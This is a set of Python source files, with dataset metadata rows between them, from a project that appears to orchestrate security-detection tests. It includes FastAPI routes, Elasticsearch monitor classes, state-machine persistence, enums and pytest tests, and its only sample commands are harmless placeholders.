def knocker_checkin(id: UUID, controller_state: ControllerStateDependency) -> List[StateObjects.Test]:
controller_state.knocker_checkin(id)
return controller_state.get_tests_by_knocker_id(id)
#endregion Knocker Management
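# Knocker-side polling sketch (illustrative, not part of this module): a
# knocker periodically checks in with its id and receives its assigned tests.
# The base URL and the `requests` dependency are assumptions for the example.
#
#   import requests
#   def example_checkin(base_url: str, knocker_id: str) -> list:
#       resp = requests.post(f"{base_url}/api/v1/knockers/{knocker_id}/checkin")
#       resp.raise_for_status()
#       return resp.json()  # JSON-encoded list of Test objects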
#region Knock Management
@v1APIRouter.get("/knocks", tags=["Knocks"])
def list_knocks(controller_state: ControllerStateDependency) -> List[StateObjects.Knock]:
return controller_state.list_knocks()
@v1APIRouter.get("/knocks/{id}", tags=["Knocks"])
def get_knock_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Knock:
return controller_state.get_knock_by_id(id)
@v1APIRouter.post("/knocks", tags=["Knocks"])
def create_knock(controller_state: ControllerStateDependency, knock: APIObjects.NewKnock) -> StateObjects.Knock:
return controller_state.create_knock(StateObjects.Knock(**asdict(knock)))
@v1APIRouter.put("/knocks/{id}", tags=["Knocks"])
def update_knock(controller_state: ControllerStateDependency, id: UUID, knock: APIObjects.UpdatedKnock) -> StateObjects.Knock:
return controller_state.update_knock(id, knock)
@v1APIRouter.delete("/knocks/{id}", tags=["Knocks"])
def delete_knock(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_knock(id)
#endregion Knock Management
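# End-to-end sketch of assembling a knock over the API (illustrative; it
# mirrors what seed_data does directly against the state). Uses FastAPI's
# TestClient, which the test suite already depends on.
#
#   from fastapi.testclient import TestClient
#   from controller.controller import api
#   with TestClient(api) as client:
#       runner = client.post("/api/v1/runners", json={
#           "name": "debian", "image_name": "debian", "image_tag": "latest"}).json()
#       knock = client.post("/api/v1/knocks", json={
#           "name": "hello", "runner_id": runner["id"],
#           "command": "echo 'Hello World!'"}).json()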
#region Runner Management
@v1APIRouter.get("/runners", tags=["Runners"])
def list_runners(controller_state: ControllerStateDependency) -> List[StateObjects.Runner]:
return controller_state.list_runners()
@v1APIRouter.get("/runners/{id}", tags=["Runners"])
def get_runner_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Runner:
return controller_state.get_runner_by_id(id)
@v1APIRouter.post("/runners", tags=["Runners"])
def create_runner(controller_state: ControllerStateDependency, runner: APIObjects.NewRunner) -> StateObjects.Runner:
return controller_state.create_runner(StateObjects.Runner(**asdict(runner)))
@v1APIRouter.put("/runners/{id}", tags=["Runners"])
def update_runner(controller_state: ControllerStateDependency, id: UUID, runner: APIObjects.UpdatedRunner) -> StateObjects.Runner:
return controller_state.update_runner(id, runner)
@v1APIRouter.delete("/runners/{id}", tags=["Runners"])
def delete_runner(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_runner(id)
#endregion Runner Management
#region Result Management
@v1APIRouter.get("/results", tags=["Results"])
def list_results(controller_state: ControllerStateDependency) -> List[StateObjects.Result]:
return controller_state.list_results()
@v1APIRouter.get("/results/{id}", tags=["Results"])
def get_result_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Result:
return controller_state.get_result_by_id(id)
@v1APIRouter.post("/results", tags=["Results"])
def create_result(controller_state: ControllerStateDependency, result: APIObjects.NewResult) -> StateObjects.Result:
return controller_state.create_result(StateObjects.Result(**asdict(result)))
@v1APIRouter.put("/results/{id}", tags=["Results"])
def update_result(controller_state: ControllerStateDependency, id: UUID, result: APIObjects.UpdatedResult) -> StateObjects.Result:
return controller_state.update_result(id, result)
@v1APIRouter.delete("/results/{id}", tags=["Results"])
def delete_result(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_result(id)
#endregion Result Management
#region Monitor Management
@v1APIRouter.get("/monitors", tags=["Monitors"])
def list_monitors(controller_state: ControllerStateDependency) -> List[StateObjects.Monitor]:
return controller_state.list_monitors()
@v1APIRouter.get("/monitors/{id}", tags=["Monitors"])
def get_monitor_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Monitor:
return controller_state.get_monitor_by_id(id)
@v1APIRouter.post("/monitors", tags=["Monitors"])
def create_monitor(controller_state: ControllerStateDependency, monitor: APIObjects.NewMonitor) -> StateObjects.Monitor:
return controller_state.create_monitor(StateObjects.Monitor(**asdict(monitor)))
@v1APIRouter.put("/monitors/{id}", tags=["Monitors"])
def update_monitor(controller_state: ControllerStateDependency, id: UUID, monitor: APIObjects.UpdatedMonitor) -> StateObjects.Monitor:
return controller_state.update_monitor(id, monitor)
@v1APIRouter.delete("/monitors/{id}", tags=["Monitors"])
def delete_monitor(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_monitor(id)
#endregion Monitor Management
#region Response Management
@v1APIRouter.get("/responses", tags=["Responses"])
def list_responses(controller_state: ControllerStateDependency) -> List[StateObjects.Response]:
return controller_state.list_responses()
@v1APIRouter.get("/responses/{id}", tags=["Responses"])
def get_response_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Response:
return controller_state.get_response_by_id(id)
@v1APIRouter.post("/responses", tags=["Responses"])
def create_response(controller_state: ControllerStateDependency, response: APIObjects.NewResponse) -> StateObjects.Response:
return controller_state.create_response(StateObjects.Response(**asdict(response)))
@v1APIRouter.put("/responses/{id}", tags=["Responses"])
def update_response(controller_state: ControllerStateDependency, id: UUID, response: APIObjects.UpdatedResponse) -> StateObjects.Response:
return controller_state.update_response(id, response)
@v1APIRouter.delete("/responses/{id}", tags=["Responses"])
def delete_response(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_response(id)
#endregion Response Management
#region ResponseExpectation Management
@v1APIRouter.get("/response-expectations", tags=["ResponseExpectations"])
def list_response_expectations(controller_state: ControllerStateDependency) -> List[StateObjects.ResponseExpectation]:
return controller_state.list_response_expectations()
@v1APIRouter.get("/response-expectations/{id}", tags=["ResponseExpectations"])
def get_response_expectation_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.ResponseExpectation:
return controller_state.get_response_expectation_by_id(id)
@v1APIRouter.post("/response-expectations", tags=["ResponseExpectations"])
def create_response_expectation(controller_state: ControllerStateDependency, response_expectation: APIObjects.NewResponseExpectation) -> StateObjects.ResponseExpectation:
return controller_state.create_response_expectation(StateObjects.ResponseExpectation(**asdict(response_expectation)))
@v1APIRouter.put("/response-expectations/{id}", tags=["ResponseExpectations"])
def update_response_expectation(controller_state: ControllerStateDependency, id: UUID, response_expectation: APIObjects.UpdatedResponseExpectation) -> StateObjects.ResponseExpectation:
return controller_state.update_response_expectation(id, response_expectation)
@v1APIRouter.delete("/response-expectations/{id}", tags=["ResponseExpectations"])
def delete_response_expectation(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_response_expectation(id)
#endregion ResponseExpectation Management
#region TestConfiguration Management
@v1APIRouter.get("/test-configurations", tags=["TestConfigurations"])
def list_test_configurations(controller_state: ControllerStateDependency) -> List[StateObjects.TestConfiguration]:
return controller_state.list_test_configurations()
@v1APIRouter.get("/test-configurations/{id}", tags=["TestConfigurations"])
def get_test_configuration_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.TestConfiguration:
return controller_state.get_test_configuration_by_id(id)
@v1APIRouter.post("/test-configurations", tags=["TestConfigurations"])
def create_test_configuration(controller_state: ControllerStateDependency, test_configuration: APIObjects.NewTestConfiguration) -> StateObjects.TestConfiguration:
return controller_state.create_test_configuration(StateObjects.TestConfiguration(**asdict(test_configuration)))
@v1APIRouter.put("/test-configurations/{id}", tags=["TestConfigurations"])
def update_test_configuration(controller_state: ControllerStateDependency, id: UUID, test_configuration: APIObjects.UpdatedTestConfiguration) -> StateObjects.TestConfiguration:
return controller_state.update_test_configuration(id, test_configuration)
@v1APIRouter.delete("/test-configurations/{id}", tags=["TestConfigurations"])
def delete_test_configuration(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_test_configuration(id)
@v1APIRouter.get("/test-configurations/{id}/runs", tags=["TestConfigurations"])
def get_test_configuration_runs(controller_state: ControllerStateDependency, id: UUID, count: int = 5) -> List[StateObjects.Test]:
return controller_state.get_latest_runs_by_test_configuration_id(id, count)
#endregion TestConfiguration Management
#region TestComponentStatus Management
@v1APIRouter.get("/test-component-statuses", tags=["TestComponentStatuses"])
def list_test_component_statuses(controller_state: ControllerStateDependency) -> List[StateObjects.TestComponentStatus]:
return controller_state.list_test_component_statuses()
@v1APIRouter.get("/test-component-statuses/{id}", tags=["TestComponentStatuses"])
def get_test_component_status_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.TestComponentStatus:
return controller_state.get_test_component_status_by_id(id)
@v1APIRouter.post("/test-component-statuses", tags=["TestComponentStatuses"])
def create_test_component_status(controller_state: ControllerStateDependency, test_component_status: APIObjects.NewTestComponentStatus) -> StateObjects.TestComponentStatus:
return controller_state.create_test_component_status(StateObjects.TestComponentStatus(**asdict(test_component_status)))
@v1APIRouter.put("/test-component-statuses/{id}", tags=["TestComponentStatuses"])
def update_test_component_status(controller_state: ControllerStateDependency, id: UUID, test_component_status: APIObjects.UpdatedTestComponentStatus) -> StateObjects.TestComponentStatus:
return controller_state.update_test_component_status(id, test_component_status)
@v1APIRouter.delete("/test-component-statuses/{id}", tags=["TestComponentStatuses"])
def delete_test_component_status(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_test_component_status(id)
@v1APIRouter.get("/test-component-statuses/by_test/{test_id}", tags=["TestComponentStatuses"])
def get_test_component_statuses_by_test_id(controller_state: ControllerStateDependency, test_id: UUID) -> List[StateObjects.TestComponentStatus]:
return controller_state.get_test_component_statuses_by_test_id(test_id)
#endregion TestComponentStatus Management
#region Test Management
@v1APIRouter.get("/tests", tags=["Tests"])
def list_tests(controller_state: ControllerStateDependency) -> List[StateObjects.Test]:
return controller_state.list_tests()
@v1APIRouter.get("/tests/{id}", tags=["Tests"])
def get_test_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.Test:
return controller_state.get_test_by_id(id)
@v1APIRouter.post("/tests", tags=["Tests"])
def create_test(controller_state: ControllerStateDependency, active_state_machines: ActiveStateMachinesDependency, test: APIObjects.NewTest) -> StateObjects.Test:
new_test = controller_state.create_test(StateObjects.Test(**asdict(test)))
active_state_machines.add_state_machine_for_test(new_test)
return new_test
@v1APIRouter.delete("/tests/{id}", tags=["Tests"])
def delete_test(controller_state: ControllerStateDependency, active_state_machines: ActiveStateMachinesDependency, id: UUID) -> None:
controller_state.delete_test(id)
    # remove_state_machine is a no-op when no machine exists for this id,
    # so no bare try/except is needed here.
    active_state_machines.remove_state_machine(id)
@v1APIRouter.put("/tests/{id}/add_component_status/{status_id}", tags=["Tests"])
def add_test_component_status(controller_state: ControllerStateDependency, id: UUID, status_id: UUID) -> StateObjects.Test:
return controller_state.add_test_component_status(id, status_id)
@v1APIRouter.get("/tests/by_status/{status}", tags=["Tests"])
def get_tests_by_status(controller_state: ControllerStateDependency, status: TestStatus) -> List[StateObjects.Test]:
return controller_state.get_tests_by_status(status)
@v1APIRouter.get("/tests/running/", tags=["Tests"])
def get_running_tests(controller_state: ControllerStateDependency) -> List[StateObjects.Test]:
return controller_state.get_running_tests()
@v1APIRouter.get("/tests/complete/", tags=["Tests"])
def get_complete_tests(controller_state: ControllerStateDependency) -> List[StateObjects.Test]:
return controller_state.get_completed_tests()
#endregion Test Management
#region TestSuite Management
@v1APIRouter.get("/test-suites", tags=["TestSuites"])
def list_test_suites(controller_state: ControllerStateDependency) -> List[StateObjects.TestSuite]:
return controller_state.list_test_suites()
@v1APIRouter.get("/test-suites/{id}", tags=["TestSuites"])
def get_test_suite_by_id(controller_state: ControllerStateDependency, id: UUID) -> StateObjects.TestSuite:
return controller_state.get_test_suite_by_id(id)
@v1APIRouter.post("/test-suites", tags=["TestSuites"])
def create_test_suite(controller_state: ControllerStateDependency, test_suite: APIObjects.NewTestSuite) -> StateObjects.TestSuite:
return controller_state.create_test_suite(StateObjects.TestSuite(**asdict(test_suite)))
@v1APIRouter.put("/test-suites/{id}", tags=["TestSuites"])
def update_test_suite(controller_state: ControllerStateDependency, id: UUID, test_suite: APIObjects.UpdatedTestSuite) -> StateObjects.TestSuite:
return controller_state.update_test_suite(id, test_suite)
@v1APIRouter.delete("/test-suites/{id}", tags=["TestSuites"])
def delete_test_suite(controller_state: ControllerStateDependency, id: UUID) -> None:
controller_state.delete_test_suite(id)
@v1APIRouter.get("/test-suites/{id}/tests", tags=["TestSuites"])
def get_all_test_configurations_in_suite(controller_state: ControllerStateDependency, id: UUID) -> List[StateObjects.TestConfiguration]:
return controller_state.get_test_configurations_in_suite(id)
@v1APIRouter.get("/test-suites/uncategorized/", tags=["TestSuites"])
def get_uncategorized_test_configurations(controller_state: ControllerStateDependency) -> List[StateObjects.TestConfiguration]:
return controller_state.get_uncategorized_test_configurations()
#endregion TestSuite Management
| 16,582 | Python | .py | 230 | 69.404348 | 186 | 0.798843 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,548 | monitor.py | loredous_tommyknocker/src/python/controller/monitor.py | import json
import logging
from typing import List
from shared.models.objects import Monitor
from shared.models.enums import MonitorType
from abc import ABC, abstractmethod
from elasticsearch import Elasticsearch
class MonitorBase(ABC):
monitor: Monitor
def initialize_logging(self):
self.logger = logging.getLogger(f"{self.monitor.name} Monitor")
@abstractmethod
def check_monitor_status(self) -> bool:
pass
@abstractmethod
def query_monitor(self, **kwargs) -> List:
pass
class MockMonitor(MonitorBase):
def __init__(self, monitor: Monitor):
if monitor.type != MonitorType.MOCK:
raise ValueError("Monitor type must be 'mock' to create MockMonitor")
        self.monitor = monitor
        self.initialize_logging()
def check_monitor_status(self) -> bool:
        # Status is driven by the monitor config; defaults to True when "response" is unset
return self.monitor.config.get("response", True)
def query_monitor(self, **kwargs):
        # The default must be valid JSON (double-quoted strings), or json.loads raises
        return json.loads(self.monitor.config.get("query_return", '["Mock return data"]'))
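# Usage sketch (illustrative): the mock monitor is driven entirely by its
# config; note "query_return" must be valid JSON, i.e. double-quoted strings.
def _example_mock_monitor() -> list:
    monitor = Monitor(name="demo", type=MonitorType.MOCK,
                      config={"response": True, "query_return": '["hit-1", "hit-2"]'})
    return MockMonitor(monitor).query_monitor()  # -> ["hit-1", "hit-2"]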
class ElasticsearchMonitor(MonitorBase):
def __init__(self, monitor: Monitor):
if monitor.type != MonitorType.ELASTICSEARCH:
raise ValueError("Monitor type must be 'elasticsearch' to create ElasticsearchMonitor")
        self.monitor = monitor
        self.initialize_logging()
try:
self.host = monitor.config["host"]
self.port = monitor.config.get("port", 9200)
self.username = monitor.config["username"]
self.password = monitor.config["password"]
self.verify_certs = monitor.config.get("verify_certs", True)
self.elasticsearch = Elasticsearch([f"{self.host}:{self.port}"], http_auth=(self.username, self.password), verify_certs=self.verify_certs) ## TODO: Add API key support
except KeyError as e:
raise ValueError(f"Monitor is missing required field {e}")
def check_monitor_status(self) -> bool:
# Check if Elasticsearch is running
return self.elasticsearch.ping()
def query_monitor(self, **kwargs):
try:
index = kwargs["index"]
query = kwargs["query"]
result = self.elasticsearch.search(index=index, body=query)
if result.get("hits", {}).get('total', 0) != 0:
return result["hits"]["hits"]
else:
return []
except Exception as e:
self.logger.exception("Exception occurred while querying Elasticsearch",e) | 2,558 | Python | .py | 56 | 37.125 | 179 | 0.664775 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,549 | dependency.py | loredous_tommyknocker/src/python/controller/dependency.py | import logging
from typing import Annotated, Dict
from uuid import UUID
from statemachine.exceptions import TransitionNotAllowed
from fastapi import Depends
from controller.statemachines import TestStateMachine
from controller.state import ControllerState, ControllerStateFactory
from shared.models.objects import Test
import pickle
from os import path
from controller.settings import app_settings
class ActiveStateMachines:
    _persist_path = path.join(app_settings.file_state_path, app_settings.statemachines_file)
    def __init__(self):
        self.logger = logging.getLogger(__name__)
        # Instance attribute (not class-level) so pickling `self` in
        # persist_to_file actually captures the running machines.
        self._active_state_machines: Dict[UUID, TestStateMachine] = {}
def add_state_machine_for_test(self, test: Test) -> TestStateMachine:
self.logger.debug(f"Adding state machine for test {test.id}")
state_machine = TestStateMachine(test)
self._active_state_machines[test.id] = state_machine
return state_machine
def get_state_machine(self, test_id: UUID) -> TestStateMachine:
return self._active_state_machines.get(test_id, None)
def remove_state_machine(self, test_id: UUID) -> None:
self.logger.debug(f"Removing state machine for test {test_id}")
self._active_state_machines.pop(test_id, None)
def persist_to_file(self):
with open(self._persist_path, 'wb') as f:
pickle.dump(self, f)
def load_from_file(self):
try:
with open(self._persist_path, "rb") as f:
state = pickle.load(f)
self.__dict__.update(state.__dict__)
        except (FileNotFoundError, EOFError, pickle.UnpicklingError):
            # No persisted state yet (or an unreadable file): start fresh
            pass
async def cycle_state_machines(self) -> None:
to_remove = []
for test_id, state_machine in self._active_state_machines.items():
self.logger.debug(f"Cycling state machine for test {test_id}")
try:
await state_machine.cycle()
self.logger.debug(f"Cycled state machine for test {test_id} to {state_machine.current_state}")
except TransitionNotAllowed as e:
self.logger.debug(f"Cycle not allowed for {test_id} in {state_machine.current_state}")
continue
except Exception as ex:
self.logger.exception(f"Error cycling state machine for test {test_id}: {ex}")
if state_machine.current_state.final:
to_remove.append(test_id)
for test_id in to_remove:
try:
self.logger.debug(f"Removing state machine for test {test_id} as it is in a final state: {self._active_state_machines[test_id].current_state}")
self.remove_state_machine(test_id)
except Exception as ex:
self.logger.exception(f"Error removing state machine for test {test_id}: {ex}")
self.persist_to_file()
class ActiveStateMachinesFactory:
_active_state_machines: ActiveStateMachines = None
@classmethod
def get_active_state_machines(cls) -> ActiveStateMachines:
if not cls._active_state_machines:
cls._active_state_machines = ActiveStateMachines()
cls._active_state_machines.load_from_file()
return cls._active_state_machines
ActiveStateMachinesDependency = Annotated[ActiveStateMachines, Depends(ActiveStateMachinesFactory.get_active_state_machines)]
ControllerStateDependency = Annotated[ControllerState, Depends(ControllerStateFactory.get_state)] | 3,421 | Python | .py | 67 | 42.238806 | 159 | 0.683263 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,550 | test_v1Api.py | loredous_tommyknocker/src/python/tests/test_v1Api.py | from uuid import UUID
from fastapi.testclient import TestClient
from controller.controller import api
import pytest
from controller.state import ControllerStateFactory
from shared.models.objects import Knocker
@pytest.fixture()
def client():
with TestClient(api) as client:
yield client
class TestV1API:
@classmethod
def setup_class(cls):
state = ControllerStateFactory.get_state()
state._knockers[UUID("00000000-0000-0000-0000-000000000001")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000001"), name="test_knocker", description="test_description")
state._knockers[UUID("00000000-0000-0000-0000-000000000002")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000002"), name="test_knocker_for_delete", description="test_description")
state._knockers[UUID("00000000-0000-0000-0000-000000000003")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knocker_for_update", description="test_description")
def test_list_knockers(self, client):
response = client.get("/api/v1/knockers")
assert response.status_code == 200
assert isinstance(response.json(), list)
def test_get_knocker_by_id(self, client):
response = client.get("/api/v1/knockers/00000000-0000-0000-0000-000000000001")
assert response.status_code == 200
assert response.json()["id"] == "00000000-0000-0000-0000-000000000001"
def test_create_knocker(self, client):
response = client.post("/api/v1/knockers", json={"name": "test_knocker_for_create", "description": "test_description"})
assert response.status_code == 200
assert response.json()["name"] == "test_knocker_for_create"
assert response.json()["description"] == "test_description"
def test_update_knocker(self, client):
response = client.put("/api/v1/knockers/00000000-0000-0000-0000-000000000003", json={"id": "00000000-0000-0000-0000-000000000003", "name": "test_knocker_for_update", "description": "UPDATED"})
assert response.status_code == 200
assert response.json()["description"] == "UPDATED"
def test_delete_knocker(self, client):
response = client.delete("/api/v1/knockers/00000000-0000-0000-0000-000000000002")
assert response.status_code == 200
get_response = client.get("/v1/knockers/00000000-0000-0000-0000-000000000002")
assert get_response.status_code == 404
def test_knocker_checkin(self, client):
response = client.post("/api/v1/knockers/00000000-0000-0000-0000-000000000001/checkin")
assert response.status_code == 200
get_response = client.get("/api/v1/knockers/00000000-0000-0000-0000-000000000001")
assert get_response.json()["last_seen"] is not None | 2,766 | Python | .py | 44 | 56.113636 | 200 | 0.714338 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,551 | test_shared_objects.py | loredous_tommyknocker/src/python/tests/test_shared_objects.py | import datetime
from uuid import uuid4
from shared.models.objects import Knocker, Runner
from shared.models.dbobjects import DBKnocker, DBRunner
def test_knocker_from_db():
db_knocker = DBKnocker(
name="test_knocker",
description="test_description",
id=uuid4(),
last_seen=datetime.datetime.now()
)
knocker = Knocker.from_db(db_knocker)
assert isinstance(knocker, Knocker)
assert knocker.name == db_knocker.name
assert knocker.description == db_knocker.description
assert knocker.id == db_knocker.id
assert knocker.last_seen == db_knocker.last_seen
def test_runner_from_db():
db_runner = DBRunner(
name="test_runner",
description="test_description",
id=uuid4(),
image_name="test_image_name",
image_tag="test_image_tag"
)
runner = Runner.from_db(db_runner)
assert isinstance(runner, Runner)
assert runner.name == db_runner.name
assert runner.description == db_runner.description
assert runner.id == db_runner.id
assert runner.image_name == db_runner.image_name
assert runner.image_tag == db_runner.image_tag | 1,163 | Python | .py | 32 | 30.9375 | 64 | 0.7 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,552 | test_state.py | loredous_tommyknocker/src/python/tests/test_state.py | import pytest
from controller.state import ControllerStateFactory, ControllerState, InMemoryState
from uuid import UUID
from controller.errors import NotFoundException
from shared.models.objects import Knocker, Knock, Runner
def test_controller_state_factory_get_state():
state = ControllerStateFactory.get_state()
assert isinstance(state, ControllerState)
assert state is ControllerStateFactory.get_state()
assert state is ControllerStateFactory.get_state()
def test_controller_state_is_abstract():
with pytest.raises(TypeError):
ControllerState()
class TestInMemoryState:
@pytest.fixture()
def in_memory_state(self):
state = InMemoryState()
state._knockers[UUID("00000000-0000-0000-0000-000000000001")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000001"), name="test_knocker", description="test_description")
state._knockers[UUID("00000000-0000-0000-0000-000000000002")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000002"), name="test_knocker_for_delete", description="test_description")
state._knockers[UUID("00000000-0000-0000-0000-000000000003")] = Knocker(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knocker_for_update", description="test_description")
state._knocks[UUID("00000000-0000-0000-0000-000000000001")] = Knock(id=UUID("00000000-0000-0000-0000-000000000001"), name="test_knock", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
state._knocks[UUID("00000000-0000-0000-0000-000000000002")] = Knock(id=UUID("00000000-0000-0000-0000-000000000002"), name="test_knock_for_delete", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
state._knocks[UUID("00000000-0000-0000-0000-000000000003")] = Knock(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knock_for_update", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
state._runners[UUID("00000000-0000-0000-0000-000000000001")] = Runner(id=UUID("00000000-0000-0000-0000-000000000001"), name="test_runner", description="test_description", image_name="test_image_name", image_tag="test_image_tag")
state._runners[UUID("00000000-0000-0000-0000-000000000002")] = Runner(id=UUID("00000000-0000-0000-0000-000000000002"), name="test_runner_for_delete", description="test_description", image_name="test_image_name", image_tag="test_image_tag")
state._runners[UUID("00000000-0000-0000-0000-000000000003")] = Runner(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_runner_for_update", description="test_description", image_name="test_image_name", image_tag="test_image_tag")
yield state
del state
def test_in_memory_state_is_controller_state(self, in_memory_state):
assert isinstance(in_memory_state, ControllerState)
    def test_list_knockers(self, in_memory_state):
        assert isinstance(in_memory_state.list_knockers(), list)
    def test_get_knocker_by_id(self, in_memory_state):
        knocker_id = UUID("00000000-0000-0000-0000-000000000001")
        assert isinstance(in_memory_state.get_knocker_by_id(knocker_id), Knocker)
        assert in_memory_state.get_knocker_by_id(knocker_id).id == knocker_id
def test_create_knocker(self, in_memory_state):
knocker = Knocker(id=UUID("00000000-0000-0000-0000-000000000004"), name="test_knocker_for_create", description="test_description")
assert isinstance(in_memory_state.create_knocker(knocker), Knocker)
assert isinstance(in_memory_state.get_knocker_by_id(knocker.id), Knocker)
assert in_memory_state.get_knocker_by_id(knocker.id) == knocker
def test_update_knocker(self, in_memory_state):
updated_knocker = Knocker(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knocker_for_update", description="UPDATED")
assert isinstance(in_memory_state.update_knocker(updated_knocker.id, updated_knocker), Knocker)
assert in_memory_state.get_knocker_by_id(updated_knocker.id) == updated_knocker
def test_delete_knocker(self, in_memory_state):
knocker_id = UUID("00000000-0000-0000-0000-000000000002")
in_memory_state.delete_knocker(knocker_id)
with pytest.raises(NotFoundException):
in_memory_state.get_knocker_by_id(knocker_id)
def test_knocker_checkin(self, in_memory_state):
knocker_id = UUID("00000000-0000-0000-0000-000000000001")
in_memory_state.knocker_checkin(knocker_id)
assert in_memory_state.get_knocker_by_id(knocker_id).last_seen is not None
def test_list_knocks(self, in_memory_state):
assert isinstance(in_memory_state.list_knocks(), list)
def test_get_knock_by_id(self, in_memory_state):
knock_id = UUID("00000000-0000-0000-0000-000000000001")
assert isinstance(in_memory_state.get_knock_by_id(knock_id), Knock)
assert in_memory_state.get_knock_by_id(knock_id).id == knock_id
def test_create_knock(self, in_memory_state):
knock = Knock(id=UUID("00000000-0000-0000-0000-000000000004"), name="test_knock_for_create", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
assert isinstance(in_memory_state.create_knock(knock), Knock)
assert in_memory_state.get_knock_by_id(knock.id) == knock
def test_update_knock(self, in_memory_state):
knock = Knock(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_knock_for_update UPDATED", runner_id=UUID("00000000-0000-0000-0000-000000000001"), command="test_command")
        assert isinstance(in_memory_state.update_knock(knock.id, knock), Knock)
assert in_memory_state.get_knock_by_id(knock.id) == knock
def test_delete_knock(self, in_memory_state):
knock_id = UUID("00000000-0000-0000-0000-000000000002")
in_memory_state.delete_knock(knock_id)
with pytest.raises(NotFoundException):
in_memory_state.get_knock_by_id(knock_id)
def test_list_runners(self, in_memory_state):
assert isinstance(in_memory_state.list_runners(), list)
def test_get_runner_by_id(self, in_memory_state):
runner_id = UUID("00000000-0000-0000-0000-000000000001")
assert isinstance(in_memory_state.get_runner_by_id(runner_id), Runner)
assert in_memory_state.get_runner_by_id(runner_id).id == runner_id
def test_create_runner(self, in_memory_state):
runner = Runner(id=UUID("00000000-0000-0000-0000-000000000004"), name="test_runner_for_create", description="test_description", image_name="test_image_name", image_tag="test_image_tag")
assert isinstance(in_memory_state.create_runner(runner), Runner)
assert in_memory_state.get_runner_by_id(runner.id) == runner
def test_update_runner(self, in_memory_state):
updated_runner = Runner(id=UUID("00000000-0000-0000-0000-000000000003"), name="test_runner_for_update", description="UPDATED", image_name="test_image_name", image_tag="test_image_tag")
        assert isinstance(in_memory_state.update_runner(updated_runner.id, updated_runner), Runner)
assert in_memory_state.get_runner_by_id(updated_runner.id) == updated_runner
def test_delete_runner(self, in_memory_state):
runner_id = UUID("00000000-0000-0000-0000-000000000002")
in_memory_state.delete_runner(runner_id)
with pytest.raises(NotFoundException):
in_memory_state.get_runner_by_id(runner_id) | 7,449 | Python | .py | 93 | 72.258065 | 251 | 0.725041 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,553 | enums.py | loredous_tommyknocker/src/python/shared/models/enums.py | from enum import Enum
class ResultType(int, Enum):
EXIT_CODE = 1
PRESENT_IN_OUTPUT = 2
REGEX_MATCH_OUTPUT = 3
class MonitorType(int, Enum):
ELASTICSEARCH = 1
MOCK = 2
class TestStatus(int, Enum):
PENDING = 1
KNOCKING = 2
CHECKING = 3
SUCCESS = 4
FAILURE = 5
ERROR = 6
class ComponentStatus(int, Enum):
PENDING = 1
RUNNING = 2
SUCCESS = 3
FAILURE = 4
ERROR = 5
class ComponentType(int, Enum):
KNOCK = 1
RESPONSE = 2 | 492 | Python | .py | 24 | 16.291667 | 33 | 0.645788 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,554 | apiobjects.py | loredous_tommyknocker/src/python/shared/models/apiobjects.py | from dataclasses import dataclass, field
from typing import Dict, List, Optional
from uuid import UUID
from shared.models.objects import MonitorType, ResultType, NotUpdated
from shared.models.enums import ComponentStatus, ComponentType, TestStatus
## Knock Objects
@dataclass
class UpdatedKnocker:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
@dataclass
class NewKnocker:
name: str
description: Optional[str] = None
@dataclass
class UpdatedKnock:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
runner_id: Optional[UUID] = NotUpdated
command: Optional[str] = NotUpdated
result_ids: Optional[List[UUID]] = NotUpdated
@dataclass
class NewKnock:
name: str
runner_id: UUID
command: str
description: Optional[str] = None
result_ids: Optional[List[UUID]] = None
@dataclass
class NewRunner:
name: str
image_name: str
image_tag: str
description: Optional[str] = None
@dataclass
class UpdatedRunner:
name: Optional[str] = NotUpdated
description: Optional[str] = NotUpdated
image_name: Optional[str] = NotUpdated
image_tag: Optional[str] = NotUpdated
@dataclass
class NewResult:
type: ResultType
value: str
